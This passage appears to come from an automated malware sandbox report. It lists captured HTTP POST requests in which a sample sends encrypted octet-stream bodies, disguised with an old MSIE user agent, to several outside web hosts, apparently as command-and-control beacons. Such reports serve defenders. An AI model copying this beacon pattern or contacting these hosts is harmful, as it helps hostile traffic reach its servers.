7a 64 46 42 41 4b 68 31 75 73 71 61 4b 50 69 6d 37 33 35 53 58 53 45 49 79 65 50 79 6a 30 47 46 34 69 57 6e 41 55 33 4b 33 66 66 59 66 57 75 36 35 49 58 36 75 63 59 73 33 6e 6e 69 58 2f 79 34 35 4a 78 5a 31 56 42 70 4f 46 58 4c 76 6d 49 3d Data Ascii: 87COzLovGI1MI5MNXXvXsv2AHkQqasikjpWngdM1WNAoVBJP2XSNZxXi4m3YPay77pVlDZrNbiarrFvl5ErnJEZ2hNDMkHTgm1fpVxPG1fYmZ1s6U5C9Jb7kQ4YxHffNgbphKJ2aTCHra3Tc2kn72/927dt5IXw2y9wLgyzRz0CIru1rVVoKipy92x2zPrDk9ZV7ePWrDDGYSYVvY2+2dhp9pGRyOP/qYkNsrgOsVd4lkeKOkNXn9zVBxFjRbYihnW0+EeYLaiWWCwoi4Fvdo6rL+vA9eb94wxXP/18i9bWvDj3Sd6e9U8IHjtVVCz/kV2Vqc92GFLZco1hcHwqDDiA3qX06YVPO4HU3UC1/q6hQfzuWh4jMhuhahc+KZDfOyt/MrVXR049O3dWlwdIJp2YydajVmhe3DYez/bDnZZeqTuVYXbc6u7B2yJBM8PaKt+1AdW9dzdFBAKh1usqaKPim735SXSEIyePyj0GF4iWnAU3K3ffYfWu65IX6ucYs3nniX/y45JxZ1VBpOFXLvmI=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.crcsi.orgCache-Control: no-cacheData Raw: 6e 71 4e 6c 4e 70 71 66 47 34 30 59 49 6f 72 4b 76 57 70 33 2f 74 33 66 6c 78 75 4b 74 77 62 51 62 67 74 73 58 70 7a 66 6d 30 52 30 6e 55 2f 78 45 63 4f 57 6a 6a 38 6c 48 41 32 6b 74 30 75 41 33 4a 35 34 2b 6c 66 4f 4c 68 36 7a 32 4d 6b 6d 49 56 48 53 6a 44 70 7a 75 44 74 41 6f 76 67 6f 35 38 51 56 48 72 37 69 5a 48 58 47 70 71 4e 49 65 61 52 4c 78 46 43 77 76 55 39 66 2b 6d 4e 54 44 43 54 37 53 63 64 6c 42 4d 68 75 5a 47 6f 72 47 56 55 61 57 41 44 50 4b 48 43 78 72 36 52 38 36 7a 59 34 68 79 54 68 6c 42 45 6a 50 68 46 6b 59 35 53 75 62 51 6a 33 4e 46 4b 48 75 43 58 59 4d 6f 4b 73 37 59 64 64 77 76 52 79 7a 6a 4c 53 68 57 70 65 6c 41 2f 75 37 33 49 53 4d 6f 44 51 34 6f 2b 36 77 39 7a 52 33 69 69 6d 33 68 63 2b 44 59 55 6b 6d 6a 4e 2f 54 37 48 2f 6d 4e 61 62 36 65 74 33 61 69 73 57 6b 57 6b 5a 4e 6f 46 51 63 69 66 41 58 7a 6d 36 69 39 7a 4e 69 65 6f 6d 71 69 62 44 46 2f 6a 31 6c 55 78 36 50 63 2b 55 6a 71 79 36 59 64 38 5a 61 49 63 52 32 46 51 66 70 4c 47 65 6e 4d 54 31 56 70 77 70 58 45 31 73 6b 69 51 72 65 45 59 45 43 6a 2b 42 64 38 6a 66 79 6a 4c 4f 64 70 6c 64 44 73 32 30 36 57 30 77 2f 63 6e 4c 50 6e 47 31 73 4c 67 33 67 50 57 34 4e 38 33 6b 6e 48 6b 6c 33 55 33 70 2f 61 70 6b 4e 65 4d 51 75 65 73 71 44 35 46 4b 7a 4c 48 49 71 2b 55 52 33 76 55 7a 49 75 33 59 61 6c 58 37 4f 37 53 47 4e 72 62 48 54 4d 2b 51 44 75 64 7a 4f 64 47 6b 2f 32 74 32 4d 67 4e 48 69 32 6a 66 31 49 6d 48 52 49 50 4b 72 52 33 7a 39 75 5a 45 61 31 39 33 73 66 57 34 77 6c 2f 49 56 6c 73 56 67 45 49 63 4a 32 46 4a 47 41 31 67 4b 6d 67 6e 2b 6a 38 4c 4d 58 4c 6a 6a 4e 62 61 59 73 59 4a 6f 32 32 43 35 52 4b 4d 56 4a 69 59 Data Ascii: nqNlNpqfG40YIorKvWp3/t3flxuKtwbQbgtsXpzfm0R0nU/xEcOWjj8lHA2kt0uA3J54+lfOLh6z2MkmIVHSjDpzuDtAovgo58QVHr7iZHXGpqNIeaRLxFCwvU9f+mNTDCT7ScdlBMhuZGorGVUaWADPKHCxr6R86zY4hyThlBEjPhFkY5SubQj3NFKHuCXYMoKs7YddwvRyzjLShWpelA/u73ISMoDQ4o+6w9zR3iim3hc+DYUkmjN/T7H/mNab6et3aisWkWkZNoFQcifAXzm6i9zNieomqibDF/j1lUx6Pc+Ujqy6Yd8ZaIcR2FQfpLGenMT1VpwpXE1skiQreEYECj+Bd8jfyjLOdpldDs206W0w/cnLPnG1sLg3gPW4N83knHkl3U3p/apkNeMQuesqD5FKzLHIq+UR3vUzIu3YalX7O7SGNrbHTM+QDudzOdGk/2t2MgNHi2jf1ImHRIPKrR3z9uZEa193sfW4wl/IVlsVgEIcJ2FJGA1gKmgn+j8LMXLjjNbaYsYJo22C5RKMVJiY
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 600User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pohlfood.comCache-Control: no-cacheData Raw: 30 70 67 67 7a 62 61 45 49 49 32 71 51 72 64 70 45 54 53 38 55 56 6b 76 53 59 50 57 4f 4d 39 38 53 68 77 71 45 70 42 77 33 6e 35 76 6f 76 49 55 4f 73 4c 57 59 4f 42 6f 2b 57 36 50 50 7a 77 66 34 4e 53 41 54 66 31 6a 71 44 79 4c 4e 39 77 4c 66 58 42 42 38 70 71 42 71 44 46 4c 66 47 52 36 76 73 37 6a 75 59 2b 39 76 70 34 6c 77 2f 61 64 36 57 72 35 79 7a 66 57 69 55 50 6c 4a 52 39 43 5a 51 6d 51 2b 32 56 71 54 4d 47 49 2f 69 6c 45 6d 6d 47 44 69 65 69 71 64 51 57 67 36 59 42 4e 56 34 79 6c 36 77 44 51 74 4c 75 75 50 74 69 4f 6a 46 57 70 50 55 42 59 6c 7a 78 79 43 67 71 74 35 4e 71 74 67 59 6a 77 48 4f 73 50 46 64 64 31 54 38 70 42 51 4a 44 32 34 50 71 42 2f 6d 4b 61 56 61 6a 4f 44 47 68 70 58 48 55 69 37 61 30 53 78 6e 53 47 79 74 2f 69 6d 2f 37 79 32 35 52 49 32 4e 68 54 74 4b 38 56 52 51 6e 4f 6a 68 36 52 54 6c 30 56 45 5a 2b 56 7a 49 72 44 47 65 47 41 63 4a 56 71 39 76 5a 68 54 4c 6c 34 6c 62 72 70 62 56 6f 62 2f 71 38 6b 4f 48 2b 78 55 50 6f 57 57 4c 58 6c 42 4c 34 4a 30 57 63 61 50 45 6d 51 2b 50 36 32 57 68 6b 4c 2b 69 39 2f 47 47 77 31 6f 6c 5a 33 75 37 30 78 48 34 74 64 36 35 32 2b 6a 5a 46 35 38 6b 6e 53 61 5a 69 59 4c 71 43 39 57 71 73 52 5a 33 61 70 30 52 69 41 6f 61 47 52 44 59 4e 33 41 50 64 51 38 73 78 39 57 4a 68 70 48 69 71 61 59 4f 6c 36 57 6a 76 71 49 36 50 57 44 58 4b 57 57 75 4e 6c 59 77 74 6d 54 74 56 62 38 54 59 79 69 6a 33 74 36 7a 32 47 72 41 53 51 5a 45 70 4d 41 59 6a 52 6d 58 75 46 33 32 4b 42 42 53 49 52 70 43 43 2f 2f 46 4b 48 45 6c 66 38 74 55 4a 2f 6e 67 31 53 7a 44 6f 77 72 65 33 79 41 4e 4a 30 6f 6a 6e 77 78 30 77 30 67 55 35 73 58 76 57 48 53 6b 74 77 44 43 2b 4b 7a 7a 46 66 54 53 2b 7a 4d 2b 4b 6b 37 46 77 31 58 59 58 65 41 62 77 4c 72 6c 45 71 61 5a 39 62 64 47 2f 46 43 32 30 65 76 6f 47 6c 4b 5a 51 50 35 54 6a 6c 52 4c 6d 6e 45 67 3d 3d Data Ascii: 0pggzbaEII2qQrdpETS8UVkvSYPWOM98ShwqEpBw3n5vovIUOsLWYOBo+W6PPzwf4NSATf1jqDyLN9wLfXBB8pqBqDFLfGR6vs7juY+9vp4lw/ad6Wr5yzfWiUPlJR9CZQmQ+2VqTMGI/ilEmmGDieiqdQWg6YBNV4yl6wDQtLuuPtiOjFWpPUBYlzxyCgqt5NqtgYjwHOsPFdd1T8pBQJD24PqB/mKaVajODGhpXHUi7a0SxnSGyt/im/7y25RI2NhTtK8VRQnOjh6RTl0VEZ+VzIrDGeGAcJVq9vZhTLl4lbrpbVob/q8kOH+xUPoWWLXlBL4J0WcaPEmQ+P62WhkL+i9/GGw1olZ3u70xH4td652+jZF58knSaZiYLqC9WqsRZ3ap0RiAoaGRDYN3APdQ8sx9WJhpHiqaYOl6WjvqI6PWDXKWWuNlYwtmTtVb8TYyij3t6z2GrASQZEpMAYjRmXuF32KBBSIRpCC//FKHElf8tUJ/ng1SzDowre3yANJ0ojnwx0w0gU5sXvWHSktwDC+KzzFfTS+zM+Kk7Fw1XYXeAbwLrlEqaZ9bdG/FC20evoGlKZQP5TjlRLmnEg==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora-ito.comCache-Control: no-cacheData Raw: 37 49 74 50 50 48 7a 42 4e 49 32 42 77 61 6a 6c 4a 79 35 51 55 67 39 32 7a 4f 73 55 42 47 77 42 63 47 6f 4e 45 48 74 79 6f 30 6e 7a 65 56 55 6b 55 59 31 51 50 6b 6e 65 6c 67 79 61 71 32 56 5a 4b 54 72 6b 6f 59 6f 31 38 52 36 4a 38 6f 67 70 42 67 34 65 61 2f 4a 65 50 35 58 4b 47 64 35 69 32 43 39 34 57 64 34 4f 5a 52 65 42 35 50 2b 35 6d 53 69 6e 6a 4e 43 50 52 6b 59 55 34 5a 45 75 56 62 59 72 4a 55 37 74 37 45 66 47 31 53 6d 67 55 2f 55 6e 49 6f 52 46 50 71 78 36 33 39 57 79 53 49 37 76 59 69 4a 4d 2b 44 38 67 41 34 72 41 75 51 56 61 6c 52 31 71 57 4f 5a 68 52 67 45 30 45 45 6f 67 33 50 6a 32 75 41 35 41 69 72 5a 35 4b 43 33 30 72 55 31 63 42 6a 61 52 65 52 4f 6b 31 76 2f 4c 78 78 69 4f 62 52 36 36 62 2b 51 44 6a 57 46 45 4d 71 68 6f 6a 4f 2f 52 4d 41 37 6a 52 74 4a 4e 7a 55 63 47 58 75 31 68 4c 35 32 54 72 6b 2f 79 69 75 4e 37 4f 4b 74 61 4e 73 62 67 59 56 69 4d 52 2b 73 72 50 4d 63 75 32 79 62 61 41 4f 71 41 36 4a 73 6c 4d 73 49 69 35 6f 36 6f 52 31 4c 43 61 35 39 38 30 6c 53 35 7a 70 67 41 58 69 73 38 45 67 69 55 7a 6b 63 43 49 43 5a 31 50 77 6a 35 48 30 73 6c 4e 6c 79 35 50 78 5a 51 44 59 71 2b 76 6f 71 73 35 6e 78 69 69 79 36 4a 44 33 2b 42 6c 63 44 65 6b 4b 62 41 68 37 5a 36 58 2b 65 62 54 53 63 57 30 32 57 5a 61 4e 6d 39 59 64 57 6e 4b 6a 33 48 54 2b 79 4b 74 4e 4a 30 4a 4e 50 32 6b 52 45 6a 4e 39 34 54 54 43 68 30 4a 6d 74 5a 79 59 51 2f 57 77 42 61 77 58 36 2f 49 39 6e 75 4e 36 78 58 74 62 32 59 36 4b 73 59 6a 51 59 75 4d 66 4c 36 34 55 48 72 57 75 6e 50 47 55 79 76 42 55 38 78 30 4b 6a 75 59 73 74 61 4d 44 62 78 68 76 63 4a 4a 62 47 6a 41 37 73 34 37 51 33 45 53 51 74 79 44 6b 57 69 51 37 4f 51 64 4e 34 54 6f 73 4c 54 72 43 6e 48 73 51 2b 6a 64 30 37 64 30 57 4c 36 31 74 2b 42 72 31 67 3d Data Ascii: 7ItPPHzBNI2BwajlJy5QUg92zOsUBGwBcGoNEHtyo0nzeVUkUY1QPknelgyaq2VZKTrkoYo18R6J8ogpBg4ea/JeP5XKGd5i2C94Wd4OZReB5P+5mSinjNCPRkYU4ZEuVbYrJU7t7EfG1SmgU/UnIoRFPqx639WySI7vYiJM+D8gA4rAuQValR1qWOZhRgE0EEog3Pj2uA5AirZ5KC30rU1cBjaReROk1v/LxxiObR66b+QDjWFEMqhojO/RMA7jRtJNzUcGXu1hL52Trk/yiuN7OKtaNsbgYViMR+srPMcu2ybaAOqA6JslMsIi5o6oR1LCa5980lS5zpgAXis8EgiUzkcCICZ1Pwj5H0slNly5PxZQDYq+voqs5nxiiy6JD3+BlcDekKbAh7Z6X+ebTScW02WZaNm9YdWnKj3HT+yKtNJ0JNP2kREjN94TTCh0JmtZyYQ/WwBawX6/I9nuN6xXtb2Y6KsYjQYuMfL64UHrWunPGUyvBU8x0KjuYstaMDbxhvcJJbGjA7s47Q3ESQtyDkWiQ7OQdN4TosLTrCnHsQ+jd07d0WL61t+Br1g=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.aevga.comCache-Control: no-cacheData Raw: 69 32 78 49 49 45 53 49 4b 34 31 6f 5a 35 37 61 58 2f 61 54 44 68 65 4d 35 51 68 38 68 74 6b 47 75 48 6d 36 74 49 69 4f 61 4c 34 46 50 52 34 75 32 42 64 79 2b 68 63 71 32 76 39 51 38 59 6b 6c 49 78 35 48 45 36 4b 62 71 33 42 72 6b 61 53 76 73 51 6c 49 55 6a 67 32 77 61 70 45 4c 51 35 64 35 67 6c 47 47 48 32 46 71 44 75 33 65 53 57 78 4e 51 55 35 6d 5a 6a 4e 44 7a 53 6f 33 76 64 49 51 6b 48 4b 79 63 2f 6a 48 4b 75 41 66 66 44 66 5a 65 61 69 38 55 4f 30 44 72 4a 56 73 44 72 48 56 58 32 6e 5a 53 48 71 50 6b 53 38 65 6f 34 7a 67 45 61 65 66 45 62 77 64 48 69 67 68 7a 4b 2f 4c 74 6a 59 58 77 2f 31 6f 70 35 2b 52 6b 5a 49 54 64 31 64 67 67 51 58 36 30 47 65 65 36 7a 43 58 79 76 64 70 4b 4a 78 52 32 37 4c 38 45 65 79 6e 43 47 55 45 68 62 6d 33 41 44 38 33 43 4a 4a 4b 45 75 66 4e 35 6d 34 78 57 6a 73 7a 4a 68 46 4b 77 69 4f 45 54 4d 33 36 37 2f 75 38 47 44 6e 6b 45 36 39 77 2f 74 57 34 55 5a 56 62 79 2b 65 64 72 7a 59 35 4c 75 2b 4b 39 79 32 49 2b 44 64 42 65 39 73 6f 62 4b 42 57 46 33 4f 2f 74 38 47 57 38 46 71 57 2b 67 38 68 74 52 52 41 54 48 67 4e 61 4b 79 36 64 4c 34 50 50 51 45 38 51 62 72 4c 58 33 6e 30 48 2f 2f 48 70 4f 2b 2f 66 6c 4b 2f 6a 4a 4d 50 44 49 5a 54 4e 58 57 42 72 45 32 30 42 44 5a 6f 35 55 6c 31 58 76 5a 32 38 4e 45 30 4e 58 57 38 6d 2f 32 37 68 56 38 30 42 64 2f 63 73 38 41 43 72 39 4e 34 51 56 63 67 4c 58 76 76 2b 52 68 32 2f 77 33 2f 4c 6e 32 62 4b 63 6a 66 38 53 6d 6d 37 36 72 76 75 75 41 50 55 2f 6e 32 37 5a 78 74 67 4a 51 7a 65 57 36 41 4c 2f 69 6e 76 2b 4b 42 4f 6f 4e 41 53 75 4e 51 66 4f 43 78 6d 36 44 74 71 45 68 55 51 45 4a 58 45 61 55 2f 52 57 6c Data Ascii: i2xIIESIK41oZ57aX/aTDheM5Qh8htkGuHm6tIiOaL4FPR4u2Bdy+hcq2v9Q8YklIx5HE6Kbq3BrkaSvsQlIUjg2wapELQ5d5glGGH2FqDu3eSWxNQU5mZjNDzSo3vdIQkHKyc/jHKuAffDfZeai8UO0DrJVsDrHVX2nZSHqPkS8eo4zgEaefEbwdHighzK/LtjYXw/1op5+RkZITd1dggQX60Gee6zCXyvdpKJxR27L8EeynCGUEhbm3AD83CJJKEufN5m4xWjszJhFKwiOETM367/u8GDnkE69w/tW4UZVby+edrzY5Lu+K9y2I+DdBe9sobKBWF3O/t8GW8FqW+g8htRRATHgNaKy6dL4PPQE8QbrLX3n0H//HpO+/flK/jJMPDIZTNXWBrE20BDZo5Ul1XvZ28NE0NXW8m/27hV80Bd/cs8ACr9N4QVcgLXvv+Rh2/w3/Ln2bKcjf8Smm76rvuuAPU/n27ZxtgJQzeW6AL/inv+KBOoNASuNQfOCxm6DtqEhUQEJXEaU/RWl
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mqs.com.brCache-Control: no-cacheCookie: __goc_session__=qevfdbkhvymvucsymoyelskgtggmizswData Raw: 6e 75 63 66 66 61 76 72 48 59 31 54 6b 62 65 44 67 67 32 4e 56 68 51 7a 4b 68 74 78 70 79 34 34 44 37 68 6d 2f 78 52 45 4e 78 77 4c 4f 47 7a 6c 5a 30 4d 75 73 51 4c 62 69 36 53 46 63 39 78 71 4c 38 35 41 66 79 65 6b 4e 48 65 33 4b 71 7a 39 67 32 30 33 5a 2f 61 64 64 75 55 70 37 53 35 79 69 72 4a 78 50 70 35 42 55 46 45 6d 45 62 56 61 50 32 49 6a 61 72 72 35 7a 52 65 7a 72 56 71 36 58 42 38 6d 55 41 6f 66 4c 63 77 76 79 4c 54 62 6e 58 45 6f 49 4b 4b 34 46 74 76 61 4b 6e 6c 51 31 72 36 55 4c 4b 5a 31 79 4c 41 30 63 44 31 46 44 51 52 41 65 70 35 43 75 38 4f 76 73 58 35 38 76 52 48 37 35 6c 6f 59 48 48 45 62 44 69 36 78 6a 50 70 2f 2f 42 37 38 67 4c 30 50 74 67 65 76 61 78 75 55 4e 4b 63 65 67 49 65 32 4e 69 36 75 57 55 52 37 42 2f 70 37 4d 35 47 67 4f 74 4d 71 6e 41 45 4e 7a 76 6f 37 49 4d 48 51 30 72 64 75 51 72 6b 48 61 44 76 35 45 37 36 76 31 4f 34 35 4e 7a 73 46 34 34 39 41 68 49 31 52 64 71 41 32 4e 6a 4b 43 44 61 67 6c 6c 65 6c 6d 43 4b 59 41 4e 73 76 42 4e 70 78 69 64 31 52 6a 41 35 47 52 61 39 43 69 6a 36 4c 34 32 4a 64 55 62 6f 64 36 61 4f 79 6d 66 52 54 4a 6a 4b 52 2f 56 44 51 76 4b 69 42 70 5a 69 56 48 50 63 2b 77 5a 51 32 51 4a 7a 47 45 65 4b 7a 32 32 6d 58 56 6f 68 32 78 51 55 42 45 66 71 76 58 66 73 75 37 78 35 4a 30 50 4c 6e 51 41 53 55 53 4e 2b 46 71 72 69 59 69 32 2b 79 78 54 64 4d 67 70 5a 70 6c 59 31 6e 4d 67 50 64 58 32 4f 36 5a 69 61 4b 51 6a 46 57 61 6f 6f 6b 51 31 2f 35 36 56 52 51 2f 76 35 41 7a 4a 79 6d 33 36 4d 50 6d 61 47 32 36 65 46 51 7a 37 4e 69 79 30 36 65 7a 32 7a 33 74 75 31 5a 44 39 50 4c 61 55 62 38 33 33 59 34 63 45 4a 6d 4b 7a 5a 31 30 77 58 44 2f 46 30 55 69 36 66 32 7a 67 47 66 50 77 57 56 77 56 4c 4d 6e 6d 41 42 65 6c 35 51 56 67 32 50 4c 2b 2b 43 30 33 65 51 67 55 64 6b 35 58 34 47 6c 39 77 3d 3d Data Ascii: nucffavrHY1TkbeDgg2NVhQzKhtxpy44D7hm/xRENxwLOGzlZ0MusQLbi6SFc9xqL85AfyekNHe3Kqz9g203Z/adduUp7S5yirJxPp5BUFEmEbVaP2Ijarr5zRezrVq6XB8mUAofLcwvyLTbnXEoIKK4FtvaKnlQ1r6ULKZ1yLA0cD1FDQRAep5Cu8OvsX58vRH75loYHHEbDi6xjPp//B78gL0PtgevaxuUNKcegIe2Ni6uWUR7B/p7M5GgOtMqnAENzvo7IMHQ0rduQrkHaDv5E76v1O45NzsF449AhI1RdqA2NjKCDagllelmCKYANsvBNpxid1RjA5GRa9Cij6L42JdUbod6aOymfRTJjKR/VDQvKiBpZiVHPc+wZQ2QJzGEeKz22mXVoh2xQUBEfqvXfsu7x5J0PLnQASUSN+FqriYi2+yxTdMgpZplY1nMgPdX2O6ZiaKQjFWaookQ1/56VRQ/v5AzJym36MPmaG26eFQz7Niy06ez2z3tu1ZD9PLaUb833Y4cEJmKzZ10wXD/F0Ui6f2zgGfPwWVwVLMnmABel5QVg2PL++C03eQgUdk5X4Gl9w==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora-ito.comCache-Control: no-cacheData Raw: 37 49 74 50 50 48 7a 42 4e 49 32 42 77 61 6a 6c 4a 79 35 51 55 67 39 32 7a 4f 73 55 42 47 77 42 63 47 6f 4e 45 48 74 79 6f 30 6e 7a 65 56 55 6b 55 59 31 51 50 6b 6e 65 6c 67 79 61 71 32 56 5a 4b 54 72 6b 6f 59 6f 31 38 52 36 4a 38 6f 67 70 42 67 34 65 61 2f 4a 65 50 35 58 4b 47 64 35 69 32 43 39 34 57 64 34 4f 5a 52 65 42 35 50 2b 35 6d 53 69 6e 6a 4e 43 50 52 6b 59 55 34 5a 45 75 56 62 59 72 4a 55 37 74 37 45 66 47 31 53 6d 67 55 2f 55 6e 49 6f 52 46 50 71 78 36 33 39 57 79 53 49 37 76 59 69 4a 4d 2b 44 38 67 41 34 72 41 75 51 56 61 6c 52 31 71 57 4f 5a 68 52 67 45 30 45 45 6f 67 33 50 6a 32 75 41 35 41 69 72 5a 35 4b 43 33 30 72 55 31 63 42 6a 61 52 65 52 4f 6b 31 76 2f 4c 78 78 69 4f 62 52 36 36 62 2b 51 44 6a 57 46 45 4d 71 68 6f 6a 4f 2f 52 4d 41 37 6a 52 74 4a 4e 7a 55 63 47 58 75 31 68 4c 35 32 54 72 6b 2f 79 69 75 4e 37 4f 4b 74 61 4e 73 62 67 59 56 69 4d 52 2b 73 72 50 4d 63 75 32 79 62 61 41 4f 71 41 36 4a 73 6c 4d 73 49 69 35 6f 36 6f 52 31 4c 43 61 35 39 38 30 6c 53 35 7a 70 67 41 58 69 73 38 45 67 69 55 7a 6b 63 43 49 43 5a 31 50 77 6a 35 48 30 73 6c 4e 6c 79 35 50 78 5a 51 44 59 71 2b 76 6f 71 73 35 6e 78 69 69 79 36 4a 44 33 2b 42 6c 63 44 65 6b 4b 62 41 68 37 5a 36 58 2b 65 62 54 53 63 57 30 32 57 5a 61 4e 6d 39 59 64 57 6e 4b 6a 33 48 54 2b 79 4b 74 4e 4a 30 4a 4e 50 32 6b 52 45 6a 4e 39 34 54 54 43 68 30 4a 6d 74 5a 79 59 51 2f 57 77 42 61 77 58 36 2f 49 39 6e 75 4e 36 78 58 74 62 32 59 36 4b 73 59 6a 51 59 75 4d 66 4c 36 34 55 48 72 57 75 6e 50 47 55 79 76 42 55 38 78 30 4b 6a 75 59 73 74 61 4d 44 62 78 68 76 63 4a 4a 62 47 6a 41 37 73 34 37 51 33 45 53 51 74 79 44 6b 57 69 51 37 4f 51 64 4e 34 54 6f 73 4c 54 72 43 6e 48 73 51 2b 6a 64 30 37 64 30 57 4c 36 31 74 2b 42 72 31 67 3d Data Ascii: 7ItPPHzBNI2BwajlJy5QUg92zOsUBGwBcGoNEHtyo0nzeVUkUY1QPknelgyaq2VZKTrkoYo18R6J8ogpBg4ea/JeP5XKGd5i2C94Wd4OZReB5P+5mSinjNCPRkYU4ZEuVbYrJU7t7EfG1SmgU/UnIoRFPqx639WySI7vYiJM+D8gA4rAuQValR1qWOZhRgE0EEog3Pj2uA5AirZ5KC30rU1cBjaReROk1v/LxxiObR66b+QDjWFEMqhojO/RMA7jRtJNzUcGXu1hL52Trk/yiuN7OKtaNsbgYViMR+srPMcu2ybaAOqA6JslMsIi5o6oR1LCa5980lS5zpgAXis8EgiUzkcCICZ1Pwj5H0slNly5PxZQDYq+voqs5nxiiy6JD3+BlcDekKbAh7Z6X+ebTScW02WZaNm9YdWnKj3HT+yKtNJ0JNP2kREjN94TTCh0JmtZyYQ/WwBawX6/I9nuN6xXtb2Y6KsYjQYuMfL64UHrWunPGUyvBU8x0KjuYstaMDbxhvcJJbGjA7s47Q3ESQtyDkWiQ7OQdN4TosLTrCnHsQ+jd07d0WL61t+Br1g=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.aevga.comCache-Control: no-cacheData Raw: 69 32 78 49 49 45 53 49 4b 34 31 6f 5a 35 37 61 58 2f 61 54 44 68 65 4d 35 51 68 38 68 74 6b 47 75 48 6d 36 74 49 69 4f 61 4c 34 46 50 52 34 75 32 42 64 79 2b 68 63 71 32 76 39 51 38 59 6b 6c 49 78 35 48 45 36 4b 62 71 33 42 72 6b 61 53 76 73 51 6c 49 55 6a 67 32 77 61 70 45 4c 51 35 64 35 67 6c 47 47 48 32 46 71 44 75 33 65 53 57 78 4e 51 55 35 6d 5a 6a 4e 44 7a 53 6f 33 76 64 49 51 6b 48 4b 79 63 2f 6a 48 4b 75 41 66 66 44 66 5a 65 61 69 38 55 4f 30 44 72 4a 56 73 44 72 48 56 58 32 6e 5a 53 48 71 50 6b 53 38 65 6f 34 7a 67 45 61 65 66 45 62 77 64 48 69 67 68 7a 4b 2f 4c 74 6a 59 58 77 2f 31 6f 70 35 2b 52 6b 5a 49 54 64 31 64 67 67 51 58 36 30 47 65 65 36 7a 43 58 79 76 64 70 4b 4a 78 52 32 37 4c 38 45 65 79 6e 43 47 55 45 68 62 6d 33 41 44 38 33 43 4a 4a 4b 45 75 66 4e 35 6d 34 78 57 6a 73 7a 4a 68 46 4b 77 69 4f 45 54 4d 33 36 37 2f 75 38 47 44 6e 6b 45 36 39 77 2f 74 57 34 55 5a 56 62 79 2b 65 64 72 7a 59 35 4c 75 2b 4b 39 79 32 49 2b 44 64 42 65 39 73 6f 62 4b 42 57 46 33 4f 2f 74 38 47 57 38 46 71 57 2b 67 38 68 74 52 52 41 54 48 67 4e 61 4b 79 36 64 4c 34 50 50 51 45 38 51 62 72 4c 58 33 6e 30 48 2f 2f 48 70 4f 2b 2f 66 6c 4b 2f 6a 4a 4d 50 44 49 5a 54 4e 58 57 42 72 45 32 30 42 44 5a 6f 35 55 6c 31 58 76 5a 32 38 4e 45 30 4e 58 57 38 6d 2f 32 37 68 56 38 30 42 64 2f 63 73 38 41 43 72 39 4e 34 51 56 63 67 4c 58 76 76 2b 52 68 32 2f 77 33 2f 4c 6e 32 62 4b 63 6a 66 38 53 6d 6d 37 36 72 76 75 75 41 50 55 2f 6e 32 37 5a 78 74 67 4a 51 7a 65 57 36 41 4c 2f 69 6e 76 2b 4b 42 4f 6f 4e 41 53 75 4e 51 66 4f 43 78 6d 36 44 74 71 45 68 55 51 45 4a 58 45 61 55 2f 52 57 6c Data Ascii: i2xIIESIK41oZ57aX/aTDheM5Qh8htkGuHm6tIiOaL4FPR4u2Bdy+hcq2v9Q8YklIx5HE6Kbq3BrkaSvsQlIUjg2wapELQ5d5glGGH2FqDu3eSWxNQU5mZjNDzSo3vdIQkHKyc/jHKuAffDfZeai8UO0DrJVsDrHVX2nZSHqPkS8eo4zgEaefEbwdHighzK/LtjYXw/1op5+RkZITd1dggQX60Gee6zCXyvdpKJxR27L8EeynCGUEhbm3AD83CJJKEufN5m4xWjszJhFKwiOETM367/u8GDnkE69w/tW4UZVby+edrzY5Lu+K9y2I+DdBe9sobKBWF3O/t8GW8FqW+g8htRRATHgNaKy6dL4PPQE8QbrLX3n0H//HpO+/flK/jJMPDIZTNXWBrE20BDZo5Ul1XvZ28NE0NXW8m/27hV80Bd/cs8ACr9N4QVcgLXvv+Rh2/w3/Ln2bKcjf8Smm76rvuuAPU/n27ZxtgJQzeW6AL/inv+KBOoNASuNQfOCxm6DtqEhUQEJXEaU/RWl
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jacomfg.comCache-Control: no-cacheData Raw: 41 48 4e 65 36 54 56 67 4f 6f 32 78 76 2b 69 55 6e 50 54 6e 44 79 36 36 42 45 7a 44 62 36 62 32 4f 51 44 6d 71 2f 63 35 4b 65 6c 73 54 37 61 46 2b 58 54 65 47 73 68 47 33 31 65 56 6e 69 41 30 75 54 4f 39 6b 50 61 67 74 42 79 4c 69 30 66 33 55 30 64 51 51 53 42 61 69 63 2b 37 62 2b 55 6e 66 34 50 30 73 4e 7a 66 61 67 37 6b 44 31 6c 61 6a 4f 53 36 5a 64 46 30 6b 76 39 32 77 71 6c 39 56 51 30 31 36 4e 71 77 49 39 4b 33 55 2b 2f 56 70 78 61 43 44 4b 42 34 32 79 78 6c 7a 53 59 63 64 37 4d 67 72 6a 78 69 38 70 31 67 33 56 76 65 56 2b 68 48 34 32 56 4e 42 42 68 55 54 6e 59 79 37 31 37 31 66 35 4d 64 56 56 58 78 41 42 4b 55 59 